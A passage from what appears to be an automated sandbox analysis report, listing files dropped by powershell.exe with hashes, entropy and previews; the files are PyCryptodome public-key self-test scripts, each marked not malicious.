                                                                                                                                                                                                              Preview:.........l.e."..............................d.Z.d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.......G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j&..................d.............y.y.).z,Self-test suite for Crypto.PublicKey.ElGamalz.$Id$.....N)...list_test_cases..a2b_hex..b2a_hex)...Random)...ElGamal)...bytes_to_long)...*c..........................e.Z.d.Z.d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...g.Z.d.d.d.d.d.d.d.d.d...d.d.d.d.d.d.d.d.d...g.Z.d...Z.d ..Z.d!..Z.d"..Z.d#..Z.d$..Z.d%..Z.d-d&..Z.d'..Z.d(..Z.d)..Z.d*..Z.d+..Z.y,)...ElGamalTest.@BA4CAEAAED8CBE952AFD2126C63EB3B345D65C2A0A73D2A3AD4138B6D09BD933..05.@60D063600ECED7C7C55146020E7A31C4476E9793BEAED420FEC9E77604CAE4EF..1D391BA2EE3C37FE1BA175A69B2C73A11238AD77675932..F5893C5BAB4131264066F57AB3D8AD89E391A0B68A68A1..48656C6C6F207468657265.@32BFD5F487966CEA9E9356715788C491EC515E4ED48B58F0F00971E93AAA5EC7.@7BE8FBFF317C93E82FCEF9BD515284BA506603FEA25D01C0CB874A31F315EE68)...p..g..y..x.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19260
                                                                                                                                                                                                              Entropy (8bit):4.609696845631252
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:1/FiVmm5Nr8hL4uh19psFf/cMGy75BBLL4asx5y4rrByx:qVJ3qphZyf/cMGy75B14asx5PByx
                                                                                                                                                                                                              MD5:7B6518872FF6F0B894CB504E116E6B12
                                                                                                                                                                                                              SHA1:8C32AD79A9B19AA0EB4360645389C6DEE1CC8D63
                                                                                                                                                                                                              SHA-256:54AF2466F306996F70A2C12CF47B1CFB954C4B17CCFF9AC72099BFACA0B95686
                                                                                                                                                                                                              SHA-512:D056CF298F7015204191E3F72D86B4D3164B814FE299098BAE82D122D2FF6CCDFACB05480AE7C773F234B1E1AAB3000B419A3F4FFCBB48F139DDCEDC3F382BE3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.2.............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j ..................d.............y.y.).z(Self-test suite for Crypto.PublicKey.RSAz.$Id$.....N)...PicklingError)...*)...list_test_cases..a2b_hex..b2a_hexc..........................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...RSATesta..... eb 7a 19 ac e9 e3 00 63 50 e3 29 50 4b 45 e2. ca 82 31 0b 26 dc d8 7d 5c 68 f1 ee a8 f5 52 67. c3 1b 2e 8b b4 25 1f 84 d7 e0 b2 c0 46 26 f5 af. f9 3e dc fb 25 c9 c2 b3 ff 8a e1 0e 83 9a 2d db. 4c dc fe 4f f4 77 28 b4 a1 b7 c1 36 2b aa d2 9a. b4 8d 28 69 d5 02 41 21 43 58 11 59 1b e3 92 f9. 82 fb 3e 87 d0 95 ae b4 04 48 db 97 2f 3a c1 4f. 7b c2 75 19 52 81 ce 32 d2 f1 b7 6d 4d
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33897
                                                                                                                                                                                                              Entropy (8bit):5.537664743735382
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:DtmI9LC4xewLbOLcYlfyCCSqYpJ4AJ7B95w6JATBJa/:DV9IaHwqODv/
                                                                                                                                                                                                              MD5:86FC17CE9E6B45D39BA225A51F6B5CDB
                                                                                                                                                                                                              SHA1:E586F59C1E6B4D0F23A7CD85ECF95C333744C643
                                                                                                                                                                                                              SHA-256:CC216AD8FEAFB57D6F5CC741A042EB6C8A0FEB8BBE5877382F17D0203612A1CF
                                                                                                                                                                                                              SHA-512:FB721A3E810EAD93D9C54C424F987DD93F42740451680A45F9FF7E19A02A56C9D83924F95ADFA715392EDAA85BCDF6454456C37524AF2FDA7135D11BF04B8336
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.e..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.....d.d.l.....d.d.l.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.e.d.k(..r...e.j.............................i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.)......N)...DSA)...*)...unhexlifyc...........................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z.d.Z.d...Z.d...Z d.Z!d ..Z"d!Z#d"..Z$d#..Z%d$..Z&d%..Z'd&..Z(d'..Z)d(..Z*y))*..ImportKeyTestslE...Y%..f$.d....`...-M~Q$Rz..S.m.(.'M.buX>8[d.(..GeY.JOl..#._.2r.h\o9...6.}a0&8[.i.lH\.@}A(j.3..*\...d3..vU".C.a.zH....g. xq.?+s:(.!HseB.)....lE....`Z....u.j.u...q.$.N1j.8.5.i.3+soM.a..He.<.W...(..Tt.....a.G.Q.\.z|$o..M.R.>.u.c.$.L.lh~.y.N.%.H...j.f.gD.}g.m.G?KV..1..v..dQ.>&y6./\8.:..l....#;.@...%.a.3h..W...e..lE....8`#.f.!.X.I.I..0}.\Zq.%.H.8.v...o7;W..@aI..@F.L...q.)V .7$W...-...X..5W]..`.+}<...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):117865
                                                                                                                                                                                                              Entropy (8bit):4.290130690918833
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:5lWiF4kWx5bzydbclloHZ88cx7kdytamvdyBm5hI:WNCq9kyI
                                                                                                                                                                                                              MD5:D8895743A68F45BF5C6D9D858E16EF29
                                                                                                                                                                                                              SHA1:14EF40AE643639F6792BDE850CFF240BA9BFF476
                                                                                                                                                                                                              SHA-256:A0F677E2B30B48765A111DA41AD8EC377F6D8B6F912AD3B904DE457EDD986061
                                                                                                                                                                                                              SHA-512:D55C8DD66A6A153A0933D436B8CC859F36E413AAA4A99083DAD7456D6D5DD4740CB860C11DAA3D759BA0C165BBBA039B85E4065DFD510A0D041E5CA4F29FEFF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z.d.Z...G.d...d.e.........Z.d;d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d...Z"d...Z#d...Z$..G.d...d.e.jJ..........................Z&..G.d...d.e.jJ..........................Z'..G.d...d.e.jJ..........................Z(..G.d...d.e.jJ..........................Z)..G.d ..d!e.jJ..........................Z*..G.d"..d#e.jJ..........................Z+..G.d$..d%e.jJ..........................Z,..G.d&..d'e.jJ..........................Z-..G.d(..d)e.jJ..........................Z...G.d*..d+e.jJ..........................Z/..G.d,..d-e.jJ..........................Z0..G.d...d/e.jJ..........................Z1..G.d0..d1e.jJ..........................Z2..G.d2..d3e.jJ..........................Z3..G.d4..d5e.jJ..........................Z4i.f.d6..Z5e6d7k(..r.d8..Z7..e.jp..................d9.:..........y.y.#.e.$.r...d.Z.Y.....w.x.Y.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41296
                                                                                                                                                                                                              Entropy (8bit):5.184371219072381
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:yiWGve+GcOooWKeNKKJX4pogaI1hNI1ZNfjL6CDoD+jn8s+8fgSMogMbe5arz:ySxLO3oRa5aH
                                                                                                                                                                                                              MD5:6E154FACCC842035B6A2571670ED03D0
                                                                                                                                                                                                              SHA1:DBA16F573ACE2FE609367C28C7898BC0D7744959
                                                                                                                                                                                                              SHA-256:9F32D2274C656B2148635B0BE9ABDC0AA7CBE0BFD6D5A57A1DFBE54B8C69C39E
                                                                                                                                                                                                              SHA-512:48075F7E14D052A7B1F52331878EB29AC384D5A4C1CD639CB24C3C003921FAD37B90EB28A43FD26956128739D05BE90B2397ACE94ED70219B82A31E973766788
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.j.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.l.Z.d.Z.d.d...Z.d.d...Z...G.d...d.e.j4..........................Z...G.d...d.e.j4..........................Z...G.d...d.e.j4..........................Z.e.d.k(..r...e.j>............................i.f.d...Z e.d.k(..r.d...Z!..e.j>..................d.............y.y.#.e.$.r...d.Z.Y...w.x.Y.w.)......N)...RSA)...a2b_hex..list_test_cases)...PEM)...b..tostr..FileNotFoundError)...inverse..bytes_to_long)...asn1TFc.....................&.....d.}...t.........s<t.........t.........j...................t.........j...................t.........j...........................|...........d.}.t.........j...................j...................t.........j...........................}.t.........j...................j...................t.........j...................j...................|.g.|.......|.........}.t.........|.|.........5.}.|.j....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9847
                                                                                                                                                                                                              Entropy (8bit):5.126770879872313
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:GwfFQHvo+3HFMW5pWfvSMkaVExfZBABjBUBO4LVXvkhaVbICOHA+EtOlNb4ZqPbG:GwdQHvtxTWiMFVMjXvkhbElwTCxr2CrZ
                                                                                                                                                                                                              MD5:7F395A7282137DE7AD45DBBBC587CC59
                                                                                                                                                                                                              SHA1:B0356AEC021563188303A2A524B6B9C49B4EBC56
                                                                                                                                                                                                              SHA-256:60F3FAF47612A9DF1B4D89B06B38E1B6286D3CF2D77F4493FE7EBAF664A087B1
                                                                                                                                                                                                              SHA-512:70BB36338F544ED31F3737712E1674C21997817A7691707081BDC101360F20E65D2B8923E7EE1F0299B5F2053815F201EF110CB69A10DA9243E040206C237A0E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_DSA.py: Self-test for the DSA primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14014
                                                                                                                                                                                                              Entropy (8bit):5.321898620860337
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Frskrs9Vq84ktZf7Tslvli+h2ZerUbZttyZMkdZeU0ZpX/ZgeUmZj9aZqELZpZ4V:Fr6q84g53slvli+h20rUbvtyykd0U0HV
                                                                                                                                                                                                              MD5:1D22C9180740F1EA72DF084954EB283D
                                                                                                                                                                                                              SHA1:B3B723EEC6826054E35187067EB99EA290DAA364
                                                                                                                                                                                                              SHA-256:1F840B622E7315C5C5A923D8454A5B9C66322CEB9D33B812CEC8A6D8761F4A2B
                                                                                                                                                                                                              SHA-512:A518551D6C8D48364F218255FCFF288F2E87D923939A7C1C1465620FB381C1275FE29F1C2453B20E37B3668D8C48E75BF2FA96A21BFE1725258FA80466FA76F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15235
                                                                                                                                                                                                              Entropy (8bit):5.323832478101059
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Frskrs9VqnIKt8lvlU+h2ZerUbZttyZMkdZeU0ZpX/ZiemZEGaZp0LZ3Td7Zxmcd:Fr6qYlvlU+h20rUbvtyykd0U0HX/oemt
                                                                                                                                                                                                              MD5:017642671098D38A9921ADA7A0951DA8
                                                                                                                                                                                                              SHA1:BC9E4CE5AD8084B4738D143535069B07AE04AA2D
                                                                                                                                                                                                              SHA-256:5CBAA220B85562E5DB201B3A0C4A038053A89EADAA8D9E2E38E06EC5F5E91784
                                                                                                                                                                                                              SHA-512:7DD94737C18B9271F75387EFEC5A2EB91A9A5AEBE73B995AF5A17AC7D667B13C98CF29150DDADBEAF17F55C278207ACD8A56D9D8CE4BF428FC3006CD5AE0896A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (320), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52772
                                                                                                                                                                                                              Entropy (8bit):5.105714890735783
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:Hr6qZFk9ZlxJd1dlN5hjlszlyvlRjlAlBXlwtrFk/lxJdPlN5h+blszlyGlRjlAT:HrpUMitfqUFJe6Qk72tf4XC5Gb
                                                                                                                                                                                                              MD5:D4E0988F7D451B2B6947B897A28EE683
                                                                                                                                                                                                              SHA1:EC447FDC1938150BA061A2694D515AE4DA2E1BC6
                                                                                                                                                                                                              SHA-256:725530571C5F6A2A7A7DBE70CA01F0D98ACF58A28A7E756AB5112264B8A1671F
                                                                                                                                                                                                              SHA-512:DABB89CDA5304D7BEEC6DE652FCBC9B4379A1D5EB2A7769D5DEF4E2BDEFB52DDE9F40662480AFD29E7D92700057893376E399A2FA85EB36E4DF9FFE9393F0639
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8865
                                                                                                                                                                                                              Entropy (8bit):5.359617066604544
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vQHvtdzhCrYVFr0PYwlVkOr8DDQVtBx2WnvBGr4:ve3h5VFEflVn8nQrBx2WnvF
                                                                                                                                                                                                              MD5:72679E90B28641849BF954433CD1E65D
                                                                                                                                                                                                              SHA1:9C879DF1BEF61E45270C49FAF745FD1A3D5D01BA
                                                                                                                                                                                                              SHA-256:DE68DD99C82D04F99B7A8DC246F9AA626B97AEBB0266D237B3F97212AC9A7F2F
                                                                                                                                                                                                              SHA-512:9383D3DB45A596462A3FD7F9AF9723AD451D0CA7CE2BEBB8C9364021623E5E85E505D9AD565C20BCB894A2FBBAF90566E947E044FC8C36A540C4F9BFAB0EBD48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_ElGamal.py: Self-test for the ElGamal primitive..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12948
                                                                                                                                                                                                              Entropy (8bit):4.976023341221772
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6wfFQHvo+oyHFCV2pK05i81ILA5204WVTHM8xTH8HS3z8Wdy8Lqe8ITy8By58GFu:6wdQHvtCV2Q0PSM56QTHgX+2BP8trZ
                                                                                                                                                                                                              MD5:32E053A4827566EF922022D85F245E73
                                                                                                                                                                                                              SHA1:6B0B7C6A5A55846EEF14E5B8E57EEBCFE79CA333
                                                                                                                                                                                                              SHA-256:C21A130AFCC95FE9C7399B96843457360412E2AF6F880502B9DA6961CFF05DD1
                                                                                                                                                                                                              SHA-512:2D1651C9DCF4063F7334BE051EBE23F792F08B4009F11A551D4B810C38DF4778CBFDA030B3F7039DB72F7598BBB90760D694172BC33660FB259F759E24903AB5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_RSA.py: Self-test for the RSA primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (606), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26063
                                                                                                                                                                                                              Entropy (8bit):5.815765795492079
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:OezqZSzvQgHHDsgPscoAeefBA7AACWzIOgrKF5ut4TiEhL6v:Fz9hHHDHsc3RaodKnutKhLs
                                                                                                                                                                                                              MD5:1F7E668CD0A3C46EC31C5CA5CBAD6BE2
                                                                                                                                                                                                              SHA1:530E5492A65FC6D0202FF2E734C1FCE0E03086D8
                                                                                                                                                                                                              SHA-256:AE72FF476A6EDF11F5C87833E61C3FA22B636FFD9A40BBA216DBE4EAAF375734
                                                                                                                                                                                                              SHA-512:31D17F6A4C7F9E6813F8C265D81EBF6D84B92494B037DA6CA341178FFD30671B8197349006A6E8D2E470143324CC6187391179639B9DC5C31904308E5BF49BAD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_import_DSA.py: Self-test for importing DSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):110530
                                                                                                                                                                                                              Entropy (8bit):4.785476957080907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:HrxUZpU2MELKo95NgqKrXXPbu26KbkksYR29NnDT:6
                                                                                                                                                                                                              MD5:9AFABC2CBEE27CA96CFF6E39B6A71F59
                                                                                                                                                                                                              SHA1:D7FC53777C2E19578D912DFAEB264B75075D6ED4
                                                                                                                                                                                                              SHA-256:6D1D11ACC8627531DA1004DA3C769145C86132D3BCFC534C2C95316461F32483
                                                                                                                                                                                                              SHA-512:5F577A3D5AD96CEBF411E6F8B85A76D26D709A8A0233344C9F2C6D429E9F304E1085FAD8D2A50729521B52743F01CA3C5036CE824FF9C2A8F9A6B9DD099A0689
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27335
                                                                                                                                                                                                              Entropy (8bit):5.573317920900425
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gee1Bv3eFHNXizsjs3FXiRZ3BnZ2+89emGHT2UoAsv0pv0Mvmg8Dab5DXTWHX/Ng:7e1xizNk+8QwlEdYdtdGd/
                                                                                                                                                                                                              MD5:F1E726C8D26E5A4EDD4F0E86D08A2DB4
                                                                                                                                                                                                              SHA1:882F48AD94D4650DF3EB8277B7ACB5559FA3FB0A
                                                                                                                                                                                                              SHA-256:4E24EC277328732141035B87E859DC566C037F7E41B64385E7C52342A85708BE
                                                                                                                                                                                                              SHA-512:077403C7FA352D037DF498DA84907A9F3245D5145000C58EA25FD848CB80999D52B10BA63F84AA6101136878FECBF8919F00E0BC8D4545C8972734F19F186E3A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_importKey.py: Self-test for importing RSA keys..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1581
                                                                                                                                                                                                              Entropy (8bit):5.226736646167872
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:lc+4470Gvw5hXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Fl7SP8ryGN:N4GHwEIB0jcQHMsvI/S3oCFhS01raZa
